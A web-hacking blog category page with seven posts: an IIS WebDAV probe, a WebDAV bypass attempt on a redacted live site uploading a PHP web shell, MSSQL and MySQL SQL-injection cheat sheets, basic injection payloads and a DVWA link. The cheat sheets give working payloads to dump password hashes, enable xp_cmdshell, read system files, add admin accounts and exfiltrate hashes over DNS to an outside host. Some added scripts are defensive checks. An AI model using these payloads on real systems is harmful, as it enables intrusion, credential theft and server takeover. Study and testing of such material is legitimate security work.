7 posts in the category 'web'

IIS/WebDAV: one of the reasons servers get compromised

Posted by nopsled
2015.11.25 03:24

nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80
OPTIONS / HTTP/1.1
Host: 192.168.0.5

HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 18:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private

^C
nopsled@smleeo3o:~/Documents/python/malware (=`ω´=)$ nc 192.168.0.5 80
PUT /test.html HTTP/1.1
Host: 192.168.0.5
Content-Length: 4

HTTP/1.1 100 Continue

test
HTTP/1.1 201 Created
Date: Tue, 24 Nov 2015 18:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://192.168.0.5/test.html
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK


Look at the method lists: the OPTIONS response advertises PUT, DELETE, COPY, MOVE and MKCOL, and an unauthenticated PUT of /test.html comes back 201 Created. Note that PUT is missing from the Allow header for / (a directory cannot be PUT) but is present in Public, and the upload works regardless, so do not judge by Allow alone. Check your own servers and fix them. 😅
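The check above can be scripted. This is an added example, not code from the original post: it parses an OPTIONS response the way the nc session is read by eye, flags the content-changing methods the server admits to, and can send the same read-only OPTIONS request to a host given on the command line. The sample response is constructed from the transcript above; the host, port and timeout are assumptions.

```python
"""Flag writable WebDAV methods from an IIS OPTIONS response (added example)."""
import socket
import sys

# Methods that create, change, move or delete resources or their properties.
# If any of these is advertised without authentication, the site can be defaced.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH"}

# Constructed sample: the OPTIONS response from the transcript above, as raw bytes.
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MS-Author-Via: DAV\r\n"
    b"DAV: 1, 2\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    b"PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, "
    b"SEARCH, MKCOL, LOCK, UNLOCK\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_headers(raw: bytes) -> dict:
    """Return a lower-cased header-name -> value dict from a raw HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return headers


def _split_methods(value: str) -> set:
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def advertised_methods(raw: bytes) -> dict:
    """Methods from Public (server-wide) and Allow (the probed URL only)."""
    h = parse_headers(raw)
    return {"public": _split_methods(h.get("public", "")),
            "allow": _split_methods(h.get("allow", ""))}


def risky_methods(raw: bytes) -> set:
    """Content-changing methods the server admits to anywhere.

    Public describes the whole server, Allow only the URL that was probed.
    In the transcript Allow for / lacks PUT, yet PUT of /test.html succeeds,
    so the check has to take Public into account as well.
    """
    m = advertised_methods(raw)
    return (m["public"] | m["allow"]) & WRITE_METHODS


def webdav_enabled(raw: bytes) -> bool:
    """IIS announces WebDAV with MS-Author-Via: DAV and a DAV compliance header."""
    h = parse_headers(raw)
    return "dav" in h or h.get("ms-author-via", "").upper() == "DAV"


def probe_options(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the same OPTIONS / request as the nc session and return the raw reply."""
    req = f"OPTIONS / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # With a hostname argument the live server is probed; otherwise the sample is used.
    raw = probe_options(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_OPTIONS_RESPONSE
    print("WebDAV enabled:", webdav_enabled(raw))
    print("content-changing methods advertised:", sorted(risky_methods(raw)))
```

The OPTIONS request is read-only, so this is safe to run against a production host; the PUT of a small canary file in the transcript is the confirming test, and is something to do only on servers you are responsible for.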

License: CC Attribution-NonCommercial


WebDAV bypass method

Posted by nopsled
2015.01.06 11:49



C:\Users\NPKI>nc www.xxxxxxx.com 80
OPTIONS / HTTP/1.1
Host: www.xxxxxxx.com

Date: Tue, 06 Jan 2015 02:34:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private



C:\Users\NPKI>nc www.xxxxxxx.com 80
PUT /images%c0%af/test.txt HTTP/1.1
Host: www.xxxxxxx.com
Content-Type: text/xml; charset="utf-8"
Connection:close
Content-Length: 30

<?php
system($_GET['cmd']);
?>

HTTP/1.1 403 Forbidden
Content-Length: 1358
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Jan 2015 02:45:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be saved.</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 굴림 }
  H1 { font: 13pt/15pt 굴림 }
  H2 { font: 9pt/12pt 굴림 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be saved.</h1>
There is a problem saving the page to the web site. This error can occur if you attempt to upload to, or modify a file in, a directory that does not allow write access.
<hr>
<p>Please try the following:</p>
<ul>
<li>If you should have write access to this directory, contact the web site administrator.</li>
</ul>
<h2>HTTP Error 403.3 - Forbidden: Write access is denied.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>403</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Using Virtual Directories</b>, <b>Changing Default Web Site Settings</b>, and <b>Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

MOVE /images%c0%af/test.txt HTTP/1.1
Host: www.xxxxxxx.com
Connection:close
Destination: /images%c0%af/racle.asp

HTTP/1.1 403 Forbidden
Connection: close
Date: Tue, 06 Jan 2015 02:46:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 44

<body><h2>HTTP/1.1 403 Forbidden</h2></body>
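Some background on what the transcript is trying, as an added example rather than part of the original post. `%c0%af` is the two-byte "overlong" UTF-8 encoding of `/` (0x2F): a conforming decoder must reject it, a permissive one turns it into `/`. The 2009 IIS 5.1/6.0 WebDAV authentication bypass (CVE-2009-1535) worked because the component enforcing per-directory access saw the raw `/images%c0%af/...` path, which does not match a protected `/images/` prefix, while the file-system layer decoded it to `/images//...` inside that directory. The MOVE that follows the PUT tries to rename the uploaded file to `racle.asp`, an extension the server would execute. On this target both requests were refused (403.3, write access denied, and 403), so nothing was uploaded. The script below shows the decoding difference with Python's strict decoder against a deliberately lenient one; the protected prefix and the sample paths are assumptions for illustration.

```python
"""Strict vs lenient UTF-8 decoding of %c0%af in a request path (added example)."""
from urllib.parse import unquote_to_bytes

PROTECTED_PREFIX = "/images/"   # assumed: a directory the server protects by URL prefix


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 without rejecting overlong forms (models a permissive canonicalizer).

    Only 1- and 2-byte sequences are handled, which is enough for %c0%af;
    any other byte is passed through as Latin-1.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # 110xxxxx 10yyyyyy -> code point xxxxxyyyyyy. There is no check that
            # the value actually needed two bytes; that omission is the bug, since
            # 0xC0 0xAF encodes 0x2F, which a correct encoder writes as one byte.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def strict_decodes(data: bytes) -> bool:
    """True if a conforming UTF-8 decoder (Python's) accepts the bytes."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def raw_path_is_protected(url_path: str) -> bool:
    """An access check that looks at the raw, still percent-encoded request path."""
    return url_path.startswith(PROTECTED_PREFIX)


def canonical_path(url_path: str) -> str:
    """The path a lenient file-system layer would actually open."""
    return lenient_utf8_decode(unquote_to_bytes(url_path))


def check_gap(url_path: str) -> dict:
    """Compare the two views of one request path."""
    canon = canonical_path(url_path)
    return {
        "raw_protected": raw_path_is_protected(url_path),
        "canonical": canon,
        "canonical_protected": canon.startswith(PROTECTED_PREFIX),
    }


if __name__ == "__main__":
    print("strict decoder accepts c0 af:", strict_decodes(b"\xc0\xaf"))
    for p in ("/images/test.txt", "/images%c0%af/test.txt"):
        print(p, check_gap(p))
```

The fix on the server side is the one IIS shipped: reject overlong sequences before any path comparison, so both components work on the same canonical string. The same mismatch appears in any stack where authorization and file access normalize paths differently.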




Web Exploit Tool Kit.pdf

Posted by nopsled
2014.03.18 01:51


WebExploitToolkit.pdf


A PDF on web exploit kits.


MSSQL SQL injection cheat sheet

Posted by nopsled
2014.03.13 01:06
Version
    SELECT @@version

Comments
    SELECT 1 -- comment
    SELECT /*comment*/1

Current User
    SELECT user_name();
    SELECT system_user;
    SELECT user;
    SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users
    SELECT name FROM master..syslogins

List Password Hashes
    SELECT name, password FROM master..sysxlogins -- priv, mssql 2000
    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in an MSSQL error message / some versions of query analyzer.
    SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005
    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005

Password Cracker
    MSSQL 2000 and 2005 hashes are both SHA1-based. phrasen|drescher can crack these.

List Privileges
    -- current privs on a particular object in 2005, 2008
    SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
    SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
    SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
    SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user

    -- current privs in 2005, 2008
    SELECT is_srvrolemember('sysadmin');
    SELECT is_srvrolemember('dbcreator');
    SELECT is_srvrolemember('bulkadmin');
    SELECT is_srvrolemember('diskadmin');
    SELECT is_srvrolemember('processadmin');
    SELECT is_srvrolemember('serveradmin');
    SELECT is_srvrolemember('setupadmin');
    SELECT is_srvrolemember('securityadmin');

    -- who has a particular priv? 2005, 2008
    SELECT name FROM master..syslogins WHERE denylogin = 0;
    SELECT name FROM master..syslogins WHERE hasaccess = 1;
    SELECT name FROM master..syslogins WHERE isntname = 0;
    SELECT name FROM master..syslogins WHERE isntgroup = 0;
    SELECT name FROM master..syslogins WHERE sysadmin = 1;
    SELECT name FROM master..syslogins WHERE securityadmin = 1;
    SELECT name FROM master..syslogins WHERE serveradmin = 1;
    SELECT name FROM master..syslogins WHERE setupadmin = 1;
    SELECT name FROM master..syslogins WHERE processadmin = 1;
    SELECT name FROM master..syslogins WHERE diskadmin = 1;
    SELECT name FROM master..syslogins WHERE dbcreator = 1;
    SELECT name FROM master..syslogins WHERE bulkadmin = 1;

List DBA Accounts
    SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for an invalid role. Also try 'bulkadmin' and the other fixed server roles from the documentation
    SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for an invalid role/username.
    SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005

Current Database
    SELECT DB_NAME()

List Databases
    SELECT name FROM master..sysdatabases;
    SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

List Columns
    SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
    SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

List Tables
    SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
    SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
    -- the second List Columns query above also lists table names together with their columns and types

Find Tables From Column Name
    -- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
    SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- lists table, column for each column containing the word 'password'

Select Nth Row
    SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row

Select Nth Char
    SELECT substring('abcd', 3, 1) -- returns c

Bitwise AND
    SELECT 6 & 2 -- returns 2
    SELECT 6 & 1 -- returns 0

ASCII Value -> Char
    SELECT char(0x41) -- returns A

Char -> ASCII Value
    SELECT ascii('A') -- returns 65

Casting
    SELECT CAST('1' as int);
    SELECT CAST(1 as char)

String Concatenation
    SELECT 'A' + 'B' -- returns AB

If Statement
    IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case Statement
    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1

Avoiding Quotes
    SELECT char(65)+char(66) -- returns AB

Time Delay
    WAITFOR DELAY '0:0:5' -- pause for 5 seconds

Make DNS Requests
    declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
    declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
    -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
    -- Also check out the DNS tunnel feature of sqlninja

Command Execution
    EXEC xp_cmdshell 'net user'; -- priv
    -- On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it is disabled by default:
    EXEC sp_configure 'show advanced options', 1; -- priv
    RECONFIGURE; -- priv
    EXEC sp_configure 'xp_cmdshell', 1; -- priv
    RECONFIGURE; -- priv

Local File Access
    CREATE TABLE mydata (line varchar(8000));
    BULK INSERT mydata FROM 'c:\boot.ini';
    DROP TABLE mydata;

Hostname, IP Address
    SELECT HOST_NAME()

Create Users
    EXEC sp_addlogin 'user', 'pass'; -- priv

Drop Users
    EXEC sp_droplogin 'user'; -- priv

Make User DBA
    EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv

Location of DB files
    EXEC sp_helpdb master; -- location of master.mdf
    EXEC sp_helpdb pubs; -- location of pubs.mdf

Default/System Databases
    northwind
    model
    msdb
    pubs -- not on sql server 2005
    tempdb

MySQL SQL injection cheat sheet

Posted by nopsled
2014.03.12 21:07
Version
    SELECT @@version

Comments
    SELECT 1; #comment
    SELECT /*comment*/1;

Current User
    SELECT user();
    SELECT system_user();

List Users
    SELECT user FROM mysql.user; -- priv

List Password Hashes
    SELECT host, user, password FROM mysql.user; -- priv

Password Cracker
    John the Ripper will crack MySQL password hashes.

List Privileges
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
    SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
    SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
    SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts
    SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
    SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database
    SELECT database()

List Databases
    SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
    SELECT distinct(db) FROM mysql.db -- priv

List Columns
    SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables
    SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name
    SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'

Select Nth Row
    SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
    SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char
    SELECT substr('abcd', 3, 1); # returns c

Bitwise AND
    SELECT 6 & 2; # returns 2
    SELECT 6 & 1; # returns 0

ASCII Value -> Char
    SELECT char(65); # returns A

Char -> ASCII Value
    SELECT ascii('A'); # returns 65

Casting
    SELECT cast('1' AS unsigned integer);
    SELECT cast('123' AS char);

String Concatenation
    SELECT CONCAT('A','B'); # returns AB
    SELECT CONCAT('A','B','C'); # returns ABC

If Statement
    SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement
    SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes
    SELECT 0x414243; # returns ABC

Time Delay
    SELECT BENCHMARK(1000000,MD5('A'));
    SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests
    Impossible?

Command Execution
    If mysqld (<5.0) is running as root AND you compromise a DBA account, you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform.

Local File Access
    ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
    SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

Hostname, IP Address
    SELECT @@hostname;

Create Users
    CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users
    DROP USER test1; -- priv

Make User DBA
    GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files
    SELECT @@datadir;

Default/System Databases
    information_schema (>= mysql 5.0)
    mysql



MySQL SQL Injection basics (and, or)

Posted by nopsled
2014.03.12 16:54

http://wh1ant.kr/archives/[Hangul] False SQL injection and Advanced blind SQL injection.txt

Before starting: I built the vulnerable web application by using and modifying the source given in the link above, and wrote this post against it.

   

   

AND

127.0.0.1/info.php?num=1' and '1'='1 (True)
Query: select * from users where num='1' and '1'='1'
From the users table, return the rows where num is 1 and 1 equals 1.
With AND, both sides have to be true.

127.0.0.1/info.php?num=1' and '1'<'1 (False)
Query: select * from users where num='1' and '1'<'1'
From the users table, return the rows where num is 1 and 1 is less than 1.
If either side is false, nothing is returned.

 

 

  



OR

127.0.0.1/info.php?num=1' or '1'='1
Query: select * from users where num='1' or '1'='1'
From the users table, return the rows where num is 1 or 1 equals 1.
Since 1 equals 1, every row is returned.

127.0.0.1/info.php?num=1' or '1'>'1
Query: select * from users where num='1' or '1'>'1'
From the users table, return the rows where num is 1 or 1 is greater than 1.
1>1 is false, so only the row with num = 1 is returned.
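The four payloads above can be run against a throwaway database to see the row counts, and to see what changes when the parameter is bound instead of concatenated. This is an added example, not code from the original post: the users table and its three rows are constructed sample data in SQLite (its string comparison behaves like MySQL's for these payloads), the vulnerable function builds the query by string concatenation exactly as the post's `num='...'` query is built, and the safe function runs the same query with a placeholder.

```python
"""and/or injection payloads against a concatenated query vs a bound parameter (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users, num stored as text like the post's query expects."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (num TEXT, name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("1", "alice"), ("2", "bob"), ("3", "carol")])
    return con


def vulnerable_lookup(con: sqlite3.Connection, num: str) -> list:
    """Models info.php?num=...: the raw parameter is pasted into the SQL text."""
    sql = "select * from users where num='" + num + "'"
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, num: str) -> list:
    """Same query with a bound parameter: the payload is only ever a value to compare."""
    return con.execute("select * from users where num=?", (num,)).fetchall()


# payload -> rows the vulnerable query returns, following the post's reasoning
PAYLOADS = {
    "1' and '1'='1": 1,   # true  -> only the num=1 row
    "1' and '1'<'1": 0,   # false -> nothing
    "1' or '1'='1": 3,    # true  -> every row
    "1' or '1'>'1": 1,    # false -> only the num=1 row
}


def demo() -> dict:
    """Return payload -> (rows from the vulnerable query, rows from the bound query)."""
    con = make_db()
    return {p: (len(vulnerable_lookup(con, p)), len(safe_lookup(con, p))) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in demo().items():
        print(f"{payload:16}  vulnerable={vuln}  parameterized={safe}")
```

With the bound parameter every payload returns zero rows, because no user has a num column literally equal to `1' or '1'='1`; the legitimate value `1` still finds its row. That is the whole difference between the two functions, and it is why the "and/or" tests only tell you something about the concatenated version.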


DVWA - Damn Vulnerable Web Application

Posted by nopsled
2014.03.12 14:15

http://www.dvwa.co.uk/


You can practice web hacking with it; run it on APM_SETUP or a plain Apache stack.

It has three difficulty levels, Low, Medium and High, each with secure coding matched to that level, which makes it a good vulnerable web application for learning step by step.




DVWA-1.0.8.zip

md5 : ac29f9b26d4f9f821cb82b2214da463a


APM SETUP

md5 : bdcd1790e2ade2c2e5e274a30c8ffbcd

 

